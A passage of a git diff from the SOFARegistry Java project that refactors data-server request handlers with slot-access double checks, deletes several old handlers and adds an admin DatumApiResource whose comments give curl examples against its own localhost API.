getDataProcessorExecutor; - private ThreadPoolExecutor getDataProcessorExecutor; + @Override + public Executor getExecutor() { + return getDataProcessorExecutor; + } - @Override - public void checkParam(GetDataRequest request) throws RuntimeException { - ParaCheckUtil.checkNotBlank(request.getDataInfoId(), "GetDataRequest.dataInfoId"); - } + @Override + public void checkParam(GetDataRequest request) { + ParaCheckUtil.checkNotBlank(request.getDataInfoId(), "GetDataRequest.dataInfoId"); + ParaCheckUtil.checkNotBlank(request.getDataCenter(), "GetDataRequest.dataCenter"); + checkSessionProcessId(request.getSessionProcessId()); + } - @Override - public Object doHandle(Channel channel, GetDataRequest request) { - String dataInfoId = request.getDataInfoId(); - if (forwardService.needForward(dataInfoId)) { - try { - LOGGER.warn("[forward] Get data request forward, request: {}", request); - return forwardService.forwardRequest(dataInfoId, request); - } catch (Exception e) { - LOGGER.error("[forward] getData request error, request: {}", request, e); - GenericResponse response = new GenericResponse(); - response.setSuccess(false); - response.setMessage(e.getMessage()); - return response; - } - } + @Override + public Object doHandle(Channel channel, GetDataRequest request) { + processSessionProcessId(channel, request.getSessionProcessId()); - return new GenericResponse>().fillSucceed(DatumCache - .getDatumGroupByDataCenter(request.getDataCenter(), dataInfoId)); + final String dataInfoId = request.getDataInfoId(); + final String dataCenter = request.getDataCenter(); + final SlotAccess slotAccessBefore = + checkAccess(dataInfoId, request.getSlotTableEpoch(), request.getSlotLeaderEpoch()); + if (!slotAccessBefore.isAccept()) { + GET_DATUM_N_COUNTER.inc(); + return SlotAccessGenericResponse.failedResponse(slotAccessBefore); } - - @Override - public GenericResponse> buildFailedResponse(String msg) { - return new GenericResponse>().fillFailed(msg); + final Datum datum = datumCache.get(dataCenter, dataInfoId); + // important. double check the slot access. avoid the case: + // 1. the slot is leader, the first check pass + // 2. slot moved and data cleaned + // 3. get datum, but null after cleaned, dangerous!! + // 3.1. session get datum by change.version, ignored null datum, would not push + // 3.2. session get datum by subscriber.register, accept null datum(the pub may not exists) and + // push empty + // so, need a double check slot access, make sure the slot's leader not change in the getting + final SlotAccess slotAccessAfter = + checkAccess(dataInfoId, request.getSlotTableEpoch(), request.getSlotLeaderEpoch()); + if (slotAccessAfter.getSlotLeaderEpoch() != slotAccessBefore.getSlotLeaderEpoch()) { + // the slot's leader has change + GET_DATUM_N_COUNTER.inc(); + return SlotAccessGenericResponse.failedResponse( + slotAccessAfter, "slotLeaderEpoch has change, prev=" + slotAccessBefore); } - - @Override - public HandlerType getType() { - return HandlerType.PROCESSER; + // return SubDatum, it's serdeSize and memoryOverhead much smaller than Datum + final SubDatum subDatum = datum != null ? DatumUtils.of(datum) : null; + GET_DATUM_Y_COUNTER.inc(); + if (subDatum != null) { + LOGGER.info( + "getD,{},{},{},{}", + dataInfoId, + dataCenter, + subDatum.getPublishers().size(), + subDatum.getVersion()); + GET_PUBLISHER_COUNTER.inc(subDatum.getPublishers().size()); + } else { + LOGGER.info("getNilD,{},{}", dataInfoId, dataCenter); } - @Override - public Class interest() { - return GetDataRequest.class; - } + return SlotAccessGenericResponse.successResponse(slotAccessAfter, subDatum); + } - @Override - protected Node.NodeType getConnectNodeType() { - return Node.NodeType.DATA; - } + @Override + protected void logRequest(Channel channel, GetDataRequest request) { + // not log + } - @Override - public Executor getExecutor() { - if (getDataProcessorExecutor == null) { - getDataProcessorExecutor = new ThreadPoolExecutorDataServer("GetDataProcessorExecutor", - dataServerBootstrapConfig.getGetDataExecutorMinPoolSize(), - dataServerBootstrapConfig.getGetDataExecutorMaxPoolSize(), - dataServerBootstrapConfig.getGetDataExecutorKeepAliveTime(), TimeUnit.SECONDS, - new ArrayBlockingQueue<>(dataServerBootstrapConfig.getGetDataExecutorQueueSize()), - new NamedThreadFactory("DataServer-GetDataProcessor-executor", true)); - } - return getDataProcessorExecutor; - } + @Override + public Class interest() { + return GetDataRequest.class; + } + + @VisibleForTesting + void setDatumCache(DatumCache datumCache) { + this.datumCache = datumCache; + } } diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/GetDataVersionsHandler.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/GetDataVersionsHandler.java index e2fa8e4e4..34ee5ab56 100644 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/GetDataVersionsHandler.java +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/GetDataVersionsHandler.java @@ -16,20 +16,23 @@ */ package com.alipay.sofa.registry.server.data.remoting.sessionserver.handler; -import com.alipay.sofa.registry.common.model.GenericResponse; -import com.alipay.sofa.registry.common.model.Node; -import com.alipay.sofa.registry.common.model.dataserver.Datum; +import static com.alipay.sofa.registry.server.data.remoting.sessionserver.handler.HandlerMetrics.GetVersion.*; + +import com.alipay.sofa.registry.common.model.dataserver.DatumVersion; import com.alipay.sofa.registry.common.model.dataserver.GetDataVersionRequest; +import com.alipay.sofa.registry.common.model.slot.SlotAccess; +import com.alipay.sofa.registry.common.model.slot.SlotAccessGenericResponse; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; import com.alipay.sofa.registry.remoting.Channel; import com.alipay.sofa.registry.server.data.cache.DatumCache; -import com.alipay.sofa.registry.server.data.remoting.handler.AbstractServerHandler; import com.alipay.sofa.registry.util.ParaCheckUtil; - -import java.util.HashMap; -import java.util.List; +import com.google.common.annotations.VisibleForTesting; +import com.google.common.collect.Maps; import java.util.Map; -import java.util.Map.Entry; -import java.util.Set; +import java.util.concurrent.Executor; +import java.util.concurrent.ThreadPoolExecutor; +import org.springframework.beans.factory.annotation.Autowired; /** * processor to get versions of specific dataInfoIds @@ -37,54 +40,114 @@ * @author qian.lqlq * @version $Id: GetDataVersionsProcessor.java, v 0.1 2017-12-06 19:56 qian.lqlq Exp $ */ -public class GetDataVersionsHandler extends AbstractServerHandler { - @Override - protected void logRequest(Channel channel, GetDataVersionRequest request) { - } +public class GetDataVersionsHandler extends AbstractDataHandler { + private static final Logger LOGGER = LoggerFactory.getLogger("GET"); + @Autowired private DatumCache datumCache; - @Override - public void checkParam(GetDataVersionRequest request) throws RuntimeException { - ParaCheckUtil.checkNotEmpty(request.getDataInfoIds(), "GetDataVersionRequest.dataInfoIds"); - } + @Autowired private ThreadPoolExecutor getDataProcessorExecutor; - @Override - public Object doHandle(Channel channel, GetDataVersionRequest request) { - Map> map = new HashMap<>(); - List dataInfoIds = request.getDataInfoIds(); - for (String dataInfoId : dataInfoIds) { - Map datumMap = DatumCache.get(dataInfoId); - Set> entrySet = datumMap.entrySet(); - for (Entry entry : entrySet) { - String dataCenter = entry.getKey(); - Datum datum = entry.getValue(); - if (datum != null) { - if (!map.containsKey(dataCenter)) { - map.put(dataCenter, new HashMap<>()); - } - map.get(dataCenter).put(dataInfoId, datum.getVersion()); - } - } - } - return new GenericResponse>>().fillSucceed(map); - } + @Override + public Executor getExecutor() { + return getDataProcessorExecutor; + } - @Override - public GenericResponse>> buildFailedResponse(String msg) { - return new GenericResponse>>().fillFailed(msg); - } + @Override + public void checkParam(GetDataVersionRequest request) { + ParaCheckUtil.checkNonNegative(request.getSlotId(), "GetDataVersionRequest.slotId"); + ParaCheckUtil.checkNotBlank(request.getDataCenter(), "GetDataVersionRequest.dataCenter"); + checkSessionProcessId(request.getSessionProcessId()); + } - @Override - public HandlerType getType() { - return HandlerType.PROCESSER; + @Override + public Object doHandle(Channel channel, GetDataVersionRequest request) { + processSessionProcessId(channel, request.getSessionProcessId()); + final int slotId = request.getSlotId(); + final String dataCenter = request.getDataCenter(); + final SlotAccess slotAccessBefore = + checkAccess(slotId, request.getSlotTableEpoch(), request.getSlotLeaderEpoch()); + if (!slotAccessBefore.isAccept()) { + return SlotAccessGenericResponse.failedResponse(slotAccessBefore); } - - @Override - public Class interest() { - return GetDataVersionRequest.class; + final Map interests = request.getInterests(); + Map getVersions = + datumCache.getVersions(dataCenter, slotId, interests.keySet()); + // double check slot access, @see GetDataHandler + final SlotAccess slotAccessAfter = + checkAccess(slotId, request.getSlotTableEpoch(), request.getSlotLeaderEpoch()); + if (slotAccessAfter.getSlotLeaderEpoch() != slotAccessBefore.getSlotLeaderEpoch()) { + return SlotAccessGenericResponse.failedResponse( + slotAccessAfter, "slotLeaderEpoch has change, prev=" + slotAccessBefore); } - - @Override - protected Node.NodeType getConnectNodeType() { - return Node.NodeType.DATA; + final boolean localDataCenter = dataServerConfig.isLocalDataCenter(dataCenter); + Map ret = Maps.newHashMapWithExpectedSize(64); + for (Map.Entry e : interests.entrySet()) { + final String dataInfoId = e.getKey(); + final DatumVersion interestVer = e.getValue(); + final DatumVersion currentVer = getVersions.get(dataInfoId); + // contains the datum which is interested + if (currentVer != null) { + if (interestVer.getValue() < currentVer.getValue()) { + // need to notify session + ret.put(dataInfoId, currentVer); + } else if (interestVer.getValue() > currentVer.getValue()) { + // the session.push version is bigger than datum.version. this may happens: + // 1. slot-1 own by data-A, balance slot-1, migrating from data-A to data-B. + // this need a very short time window to broadcast the information. e.g. a heartbeat + // interval time + // 2.1. part of session/data has not updated the slotTable. [session-A, data-A] + // 2.2. another part of the session/data has updated the slotTable. [session-B, data-B] + // 3. data-B finish migrating and session-B put publisher-B to data-B gen a new + // datum.version=V1 + // 4. session-A put publisher-A to data-A, gen a new datum.version=V2(V1 { - - /** LOGGER */ - private static final Logger LOGGER = LoggerFactory - .getLogger(PublishDataHandler.class); - - @Autowired - private ForwardService forwardService; - - @Autowired - private SessionServerConnectionFactory sessionServerConnectionFactory; - - @Autowired - private DataChangeEventCenter dataChangeEventCenter; - - @Autowired - private DataServerConfig dataServerConfig; - - private ThreadPoolExecutor publishExecutor; - - public PublishDataHandler(DataServerConfig dataServerConfig) { - - publishExecutor = new ThreadPoolExecutorDataServer("PublishProcessorExecutor", - dataServerConfig.getPublishExecutorMinPoolSize(), - dataServerConfig.getPublishExecutorMaxPoolSize(), - dataServerConfig.getNotifyDataSyncExecutorKeepAliveTime(), TimeUnit.SECONDS, - new ArrayBlockingQueue<>(dataServerConfig.getPublishExecutorQueueSize()), - new NamedThreadFactory("DataServer-PublishProcessorExecutor-executor", true)); - } - - @Override - public void checkParam(PublishDataRequest request) throws RuntimeException { - Publisher publisher = request.getPublisher(); - ParaCheckUtil.checkNotNull(publisher, "PublishDataRequest.publisher"); - ParaCheckUtil.checkNotBlank(publisher.getDataId(), "publisher.dataId"); - ParaCheckUtil.checkNotBlank(publisher.getInstanceId(), "publisher.instanceId"); - ParaCheckUtil.checkNotBlank(publisher.getGroup(), "publisher.group"); - ParaCheckUtil.checkNotBlank(publisher.getDataInfoId(), "publisher.dataInfoId"); - ParaCheckUtil.checkNotNull(publisher.getVersion(), "publisher.version"); - ParaCheckUtil.checkNotBlank(publisher.getRegisterId(), "publisher.registerId"); - - if (publisher.getPublishType() != PublishType.TEMPORARY) { - ParaCheckUtil.checkNotNull(publisher.getSourceAddress(), "publisher.sourceAddress"); - } - } - - @Override - public Object doHandle(Channel channel, PublishDataRequest request) { - Publisher publisher = Publisher.processPublisher(request.getPublisher()); - if (forwardService.needForward(publisher.getDataInfoId())) { - LOGGER.warn("[forward] Publish request refused, request: {}", request); - CommonResponse response = new CommonResponse(); - response.setSuccess(false); - response.setMessage("Request refused, Server status is not working"); - return response; - } - - dataChangeEventCenter.onChange(publisher, dataServerConfig.getLocalDataCenter()); - if (publisher.getPublishType() != PublishType.TEMPORARY) { - sessionServerConnectionFactory.registerClient(request.getSessionServerProcessId(), - publisher.getSourceAddress().getAddressString()); - } - - return CommonResponse.buildSuccessResponse(); - } - - @Override - public CommonResponse buildFailedResponse(String msg) { - return new CommonResponse(false, msg); - } - - @Override - public HandlerType getType() { - return HandlerType.PROCESSER; - } - - @Override - public Class interest() { - return PublishDataRequest.class; - } - - @Override - protected Node.NodeType getConnectNodeType() { - return Node.NodeType.DATA; - } - - @Override - public Executor getExecutor() { - return publishExecutor; - } -} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/SessionServerRegisterHandler.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/SessionServerRegisterHandler.java deleted file mode 100644 index a136fa06f..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/SessionServerRegisterHandler.java +++ /dev/null @@ -1,78 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.sessionserver.handler; - -import com.alipay.sofa.registry.common.model.CommonResponse; -import com.alipay.sofa.registry.common.model.Node; -import com.alipay.sofa.registry.common.model.dataserver.SessionServerRegisterRequest; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.bolt.BoltChannel; -import com.alipay.sofa.registry.server.data.remoting.handler.AbstractServerHandler; -import com.alipay.sofa.registry.server.data.remoting.sessionserver.SessionServerConnectionFactory; -import com.alipay.sofa.registry.util.ParaCheckUtil; -import org.springframework.beans.factory.annotation.Autowired; - -import java.util.HashSet; -import java.util.Set; - -/** - * - * @author qian.lqlq - * @version $Id: SessionServerRegisterProcessor.java, v 0.1 2018年04月14日 17:32 qian.lqlq Exp $ - */ -public class SessionServerRegisterHandler extends - AbstractServerHandler { - - @Autowired - private SessionServerConnectionFactory sessionServerConnectionFactory; - - @Override - public void checkParam(SessionServerRegisterRequest request) throws RuntimeException { - ParaCheckUtil.checkNotBlank(request.getProcessId(), "processId"); - } - - @Override - public Object doHandle(Channel channel, SessionServerRegisterRequest request) { - Set clientHosts = request.getClientHosts(); - if (clientHosts == null) { - clientHosts = new HashSet<>(); - } - sessionServerConnectionFactory.register(request.getProcessId(), clientHosts, - ((BoltChannel) channel).getConnection()); - return CommonResponse.buildSuccessResponse(); - } - - @Override - public CommonResponse buildFailedResponse(String msg) { - return CommonResponse.buildFailedResponse(msg); - } - - @Override - public HandlerType getType() { - return HandlerType.PROCESSER; - } - - @Override - public Class interest() { - return SessionServerRegisterRequest.class; - } - - @Override - protected Node.NodeType getConnectNodeType() { - return Node.NodeType.DATA; - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/UnPublishDataHandler.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/UnPublishDataHandler.java deleted file mode 100644 index 2a297ed6b..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/UnPublishDataHandler.java +++ /dev/null @@ -1,94 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.sessionserver.handler; - -import com.alipay.sofa.registry.common.model.CommonResponse; -import com.alipay.sofa.registry.common.model.Node; -import com.alipay.sofa.registry.common.model.dataserver.UnPublishDataRequest; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; -import com.alipay.sofa.registry.server.data.cache.UnPublisher; -import com.alipay.sofa.registry.server.data.change.event.DataChangeEventCenter; -import com.alipay.sofa.registry.server.data.remoting.handler.AbstractServerHandler; -import com.alipay.sofa.registry.server.data.remoting.sessionserver.forward.ForwardService; -import com.alipay.sofa.registry.util.ParaCheckUtil; -import org.springframework.beans.factory.annotation.Autowired; - -/** - * processor to unPublish specific data - * - * @author qian.lqlq - * @version $Id: UnPublishDataProcessor.java, v 0.1 2017-12-01 15:48 qian.lqlq Exp $ - */ -public class UnPublishDataHandler extends AbstractServerHandler { - - /** LOGGER */ - private static final Logger LOGGER = LoggerFactory.getLogger(UnPublishDataHandler.class); - - @Autowired - private ForwardService forwardService; - - @Autowired - private DataChangeEventCenter dataChangeEventCenter; - - @Autowired - private DataServerConfig dataServerConfig; - - @Override - public void checkParam(UnPublishDataRequest request) throws RuntimeException { - ParaCheckUtil.checkNotBlank(request.getDataInfoId(), "UnPublishDataRequest.dataInfoId"); - ParaCheckUtil.checkNotBlank(request.getRegisterId(), "UnPublishDataRequest.registerId"); - } - - @Override - public Object doHandle(Channel channel, UnPublishDataRequest request) { - if (forwardService.needForward(request.getDataInfoId())) { - LOGGER.warn("[forward] UnPublish request refused, request: {}", request); - CommonResponse response = new CommonResponse(); - response.setSuccess(false); - response.setMessage("Request refused, Server status is not working"); - return response; - } - - dataChangeEventCenter.onChange( - new UnPublisher(request.getDataInfoId(), request.getRegisterId(), request - .getRegisterTimestamp()), dataServerConfig.getLocalDataCenter()); - return CommonResponse.buildSuccessResponse(); - } - - @Override - public CommonResponse buildFailedResponse(String msg) { - return CommonResponse.buildFailedResponse(msg); - } - - @Override - public HandlerType getType() { - return HandlerType.PROCESSER; - } - - @Override - public Class interest() { - return UnPublishDataRequest.class; - } - - @Override - protected Node.NodeType getConnectNodeType() { - return Node.NodeType.DATA; - } -} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/resource/DataDigestResource.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/resource/DataDigestResource.java index 786bf7af0..e6c74052a 100644 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/resource/DataDigestResource.java +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/resource/DataDigestResource.java @@ -16,102 +16,165 @@ */ package com.alipay.sofa.registry.server.data.resource; +import com.alipay.remoting.Connection; +import com.alipay.sofa.registry.common.model.ConnectId; import com.alipay.sofa.registry.common.model.dataserver.Datum; import com.alipay.sofa.registry.common.model.store.DataInfo; import com.alipay.sofa.registry.common.model.store.Publisher; -import com.alipay.sofa.registry.net.NetUtil; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.remoting.Server; +import com.alipay.sofa.registry.remoting.bolt.BoltChannel; +import com.alipay.sofa.registry.remoting.exchange.Exchange; +import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; import com.alipay.sofa.registry.server.data.cache.DatumCache; - -import javax.ws.rs.GET; -import javax.ws.rs.POST; -import javax.ws.rs.Path; -import javax.ws.rs.Produces; -import javax.ws.rs.QueryParam; -import javax.ws.rs.core.MediaType; +import com.alipay.sofa.registry.server.data.remoting.metaserver.MetaServerServiceImpl; +import com.alipay.sofa.registry.util.ParaCheckUtil; +import com.google.common.collect.Lists; +import java.util.Collections; import java.util.HashMap; +import java.util.List; import java.util.Map; import java.util.Map.Entry; +import javax.ws.rs.*; +import javax.ws.rs.core.MediaType; +import org.apache.commons.lang.StringUtils; +import org.springframework.beans.factory.annotation.Autowired; /** - * * @author shangyu.wh * @version $Id: DataDigestResource.java, v 0.1 2018-10-19 16:16 shangyu.wh Exp $ */ @Path("digest") public class DataDigestResource { - @GET - @Path("datum/query") - @Produces(MediaType.APPLICATION_JSON) - public Map getDatumByDataInfoId(@QueryParam("dataId") String dataId, - @QueryParam("group") String group, - @QueryParam("instanceId") String instanceId, - @QueryParam("dataCenter") String dataCenter) { - Map retList = new HashMap<>(); - - if (!isBlank(dataId) && !isBlank(instanceId) && !isBlank(group)) { - - String dataInfoId = DataInfo.toDataInfoId(dataId, instanceId, group); - if (isBlank(dataCenter)) { - retList = DatumCache.get(dataInfoId); - } else { - retList.put(dataCenter, DatumCache.get(dataCenter, dataInfoId)); - } + private static final String SESSION = "SESSION"; - } - return retList; + private static final String META = "META"; + + @Autowired Exchange boltExchange; + + @Autowired MetaServerServiceImpl metaServerService; + + @Autowired DataServerConfig dataServerConfig; + + @Autowired DatumCache datumCache; + + @GET + @Path("datum/query") + @Produces(MediaType.APPLICATION_JSON) + public Map getDatumByDataInfoId( + @QueryParam("dataId") String dataId, + @QueryParam("group") String group, + @QueryParam("instanceId") String instanceId, + @QueryParam("dataCenter") String dataCenter) { + + ParaCheckUtil.checkNotBlank(dataId, "dataId"); + ParaCheckUtil.checkNotBlank(group, "group"); + ParaCheckUtil.checkNotBlank(instanceId, "instanceId"); + ParaCheckUtil.checkNotBlank(dataCenter, "dataCenter"); + String dataInfoId = DataInfo.toDataInfoId(dataId, instanceId, group); + Map retList = new HashMap<>(); + retList.put(dataCenter, datumCache.get(dataCenter, dataInfoId)); + return retList; + } + + @POST + @Path("connect/query") + @Produces(MediaType.APPLICATION_JSON) + public Map> getPublishersByConnectId(Map map) { + Map> ret = new HashMap<>(); + if (map != null && !map.isEmpty()) { + map.forEach( + (clientConnectId, sessionConnectId) -> { + ConnectId connectId = ConnectId.of(clientConnectId, sessionConnectId); + Map publisherMap = datumCache.getByConnectId(connectId); + if (publisherMap != null && !publisherMap.isEmpty()) { + ret.put(connectId.toString(), publisherMap); + } + }); } + return ret; + } + + @GET + @Path("datum/count") + @Produces(MediaType.APPLICATION_JSON) + public String getDatumCount() { + return getLocalDatumCount(); + } - @POST - @Path("connect/query") - @Produces(MediaType.APPLICATION_JSON) - public Map> getPublishersByConnectId(Map map) { - Map> ret = new HashMap<>(); - if (map != null && !map.isEmpty()) { - map.forEach((ip, port) -> { - String connectId = NetUtil.genHost(ip, Integer.valueOf(port)); - if (!connectId.isEmpty()) { - Map publisherMap = DatumCache.getByHost(connectId); - if (publisherMap != null && !publisherMap.isEmpty()) { - ret.put(connectId, publisherMap); - } - } - }); + protected String getLocalDatumCount() { + StringBuilder sb = new StringBuilder("CacheDigest"); + try { + + Map> allMap = datumCache.getAll(); + if (!allMap.isEmpty()) { + for (Entry> dataCenterEntry : allMap.entrySet()) { + String dataCenter = dataCenterEntry.getKey(); + Map datumMap = dataCenterEntry.getValue(); + sb.append( + String.format(" [Datum] size of datum in %s is %s", dataCenter, datumMap.size())); + int pubCount = datumMap.values().stream().mapToInt(Datum::publisherSize).sum(); + sb.append( + String.format(",[Publisher] size of publisher in %s is %s", dataCenter, pubCount)); } - return ret; + } else { + sb.append(" datum cache is empty"); + } + + } catch (Throwable t) { + sb.append(" cache digest error!"); } - @GET - @Path("datum/count") - @Produces(MediaType.APPLICATION_JSON) - public String getDatumCount() { - StringBuilder sb = new StringBuilder("CacheDigest"); - try { - - Map> allMap = DatumCache.getAll(); - if (!allMap.isEmpty()) { - for (Entry> dataCenterEntry : allMap.entrySet()) { - String dataCenter = dataCenterEntry.getKey(); - Map datumMap = dataCenterEntry.getValue(); - sb.append(String.format(" [Datum] size of datum in %s is %s", - dataCenter, datumMap.size())); - int pubCount = datumMap.values().stream().map(Datum::getPubMap) - .filter(map -> map != null && !map.isEmpty()).mapToInt(Map::size).sum(); - sb.append(String.format(",[Publisher] size of publisher in %s is %s", - dataCenter, pubCount)); - } - } else { - sb.append(" datum cache is empty"); - } + return sb.toString(); + } - } catch (Throwable t) { - sb.append(" cache digest error!"); - } + @GET + @Path("{type}/serverList/query") + @Produces(MediaType.APPLICATION_JSON) + public Map> getServerListAll(@PathParam("type") String type) { + Map> map = new HashMap<>(); + if (StringUtils.isNotBlank(type)) { + String inputType = type.trim().toUpperCase(); + + switch (inputType) { + case SESSION: + List sessionList = getSessionServerList(); + map.put(dataServerConfig.getLocalDataCenter(), sessionList); + break; + case META: + List metaList = getMetaServerLeader(); + map.put(dataServerConfig.getLocalDataCenter(), metaList); + break; + default: + throw new IllegalArgumentException("unsupported server type:" + type); + } + } - return sb.toString(); + return map; + } + + List getSessionServerList() { + Server server = boltExchange.getServer(dataServerConfig.getPort()); + if (server == null) { + return Collections.emptyList(); + } + Map channels = server.selectAvailableChannelsForHostAddress(); + List ret = Lists.newArrayListWithCapacity(channels.size()); + for (Channel channel : channels.values()) { + BoltChannel boltChannel = (BoltChannel) channel; + Connection conn = boltChannel.getConnection(); + ret.add(conn.getRemoteIP() + ":" + conn.getRemotePort()); } + return ret; + } - private boolean isBlank(String dataInfoId) { - return dataInfoId == null || dataInfoId.isEmpty(); + List getMetaServerLeader() { + String leader = metaServerService.getMetaServerLeader(); + if (StringUtils.isNotBlank(leader)) { + return Lists.newArrayList(leader); + } else { + return Collections.emptyList(); } -} \ No newline at end of file + } +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/resource/DatumApiResource.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/resource/DatumApiResource.java new file mode 100644 index 000000000..03b1207ab --- /dev/null +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/resource/DatumApiResource.java @@ -0,0 +1,358 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.resource; + +import com.alipay.sofa.registry.common.model.CommonResponse; +import com.alipay.sofa.registry.common.model.ProcessId; +import com.alipay.sofa.registry.common.model.ServerDataBox; +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.common.model.dataserver.BatchRequest; +import com.alipay.sofa.registry.common.model.dataserver.Datum; +import com.alipay.sofa.registry.common.model.slot.Slot; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.common.model.store.UnPublisher; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; +import com.alipay.sofa.registry.server.data.cache.DatumCache; +import com.alipay.sofa.registry.server.data.cache.DatumStorage; +import com.alipay.sofa.registry.server.data.slot.SlotManager; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; +import com.alipay.sofa.registry.server.shared.remoting.AbstractServerHandler; +import com.alipay.sofa.registry.server.shared.util.DatumUtils; +import com.google.common.collect.Lists; +import java.util.*; +import javax.ws.rs.GET; +import javax.ws.rs.POST; +import javax.ws.rs.Path; +import javax.ws.rs.Produces; +import javax.ws.rs.core.MediaType; +import org.apache.commons.lang.StringUtils; +import org.apache.commons.lang.Validate; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author kezhu.wukz + * @version $Id: DatumApiResource.java, v 0.1 2019-07-01 16:16 kezhu.wukz Exp $ + */ +@Path("datum/api") +public class DatumApiResource { + + private static final Logger LOGGER = LoggerFactory.getLogger(DatumApiResource.class); + + private static final ProcessId TEMP_SESSION_PROCESSID = ServerEnv.PROCESS_ID; + + @Autowired DataServerConfig dataServerConfig; + + @Autowired DatumCache datumCache; + + @Autowired DatumStorage localDatumStorage; + + @Autowired AbstractServerHandler batchPutDataHandler; + + @Autowired SlotManager slotManager; + + /** + * curl -i -d '{"dataInfoId":"testDataId#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP"}' -H + * "Content-Type: application/json" -X POST http://localhost:9622/datum/api/get + */ + @POST + @Path("/get") + @Produces(MediaType.APPLICATION_JSON) + public CommonResponse get(DatumParam datumParam) { + try { + validateAndCorrect(datumParam); + } catch (RuntimeException e) { + LOGGER.error(e.getMessage(), e); + return CommonResponse.buildFailedResponse(e.getMessage()); + } + + Datum datum = datumCache.get(datumParam.getDataCenter(), datumParam.getDataInfoId()); + if (datum == null) { + return getNotFoundResponse(datumParam); + } + + return createResponse(datum); + } + + /** + * curl -i -d '{"dataInfoId":"testDataId#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP"}' -H + * "Content-Type: application/json" -X POST http://localhost:9622/datum/api/delete + */ + @POST + @Path("/delete") + @Produces(MediaType.APPLICATION_JSON) + public CommonResponse delete(DatumParam datumParam) { + try { + checkTestApiEnable(); + validateAndCorrect(datumParam); + } catch (RuntimeException e) { + LOGGER.error(e.getMessage(), e); + return CommonResponse.buildFailedResponse(e.getMessage()); + } + + Datum datum = datumCache.get(datumParam.getDataCenter(), datumParam.getDataInfoId()); + if (datum == null) { + return getNotFoundResponse(datumParam); + } + datumCache.clean(datumParam.getDataCenter(), datumParam.getDataInfoId()); + // get the newly datum + datum = datumCache.get(datumParam.getDataCenter(), datumParam.getDataInfoId()); + return createResponse(datum); + } + + /** + * curl -i -d '{"dataInfoId":"testDataId#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP", + * "publisherDataBox":"1234", "publisherCell":"TestZone2", "publisherConnectId":"127.0.0.1:80"} ' + * -H "Content-Type: application/json" -X POST http://localhost:9622/datum/api/pub/add curl -i -d + * '{"dataInfoId":"testDataId#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP", "publisherDataBox":"1234", + * "publisherCell":"TestZone2"} 